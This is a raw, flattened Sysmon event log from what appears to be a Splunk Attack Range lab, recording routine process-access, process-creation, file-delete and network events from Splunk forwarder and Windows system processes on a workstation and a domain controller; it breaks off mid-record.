07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082737Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082736Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082735Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082734Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082733Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082732Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B406-615A-7901-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082731Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B406-615A-7901-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082730Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.991{2FDD8D40-B406-615A-7901-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082729Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.724{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0464AE9A8D3FB55DF85886AF4F255C38,SHA256=2E3525FADF3CE93415CCFA95AFA537C1997B7B4C197DEED4AD4C7BE94732D813,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104821Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B406-615A-FE01-00000000FC01}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104820Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104819Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104818Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104817Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104816Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B406-615A-FE01-00000000FC01}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104815Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.584{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B406-615A-FE01-00000000FC01}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104814Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.585{58E9C193-B406-615A-FE01-00000000FC01}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104813Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:57.166{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51730-false10.0.1.12-8089- 23542300x8000000000000000104812Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.115{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D994F2BEBD3F0D80F19FC601E4386B1,SHA256=32263D8CB38889918954D73143A96B6D8EC2C3607CE9F0DD7258504559843A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082745Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:59.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6923FF1CD5CB35ED407AC63A3F11B013,SHA256=A0DE8E5C9FFC532D771149884AC3E7D00CC31BAD1DDD4D483DBD877597D1E051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082744Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:59.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8B66A86AB38096AB5F22FAD9738E665,SHA256=8B0DD7B2D647F270FC89C7948AAA47E148554ABEE965228C8851330FF96CF4EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082743Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:59.740{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A16ED1CF860EB2A3D361DC5A6CB6E876,SHA256=8E1CFC08E72A2FCAA70091CE1A73487B9BAD3219B04083AD5906DAEFCADE2A6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104835Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.725{58E9C193-B407-615A-FF01-00000000FC01}57846000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104834Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.307{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51731-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104833Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:58.307{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51731-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000104832Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B407-615A-FF01-00000000FC01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104831Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104830Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104829Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104828Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104827Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B407-615A-FF01-00000000FC01}5784C:\Program 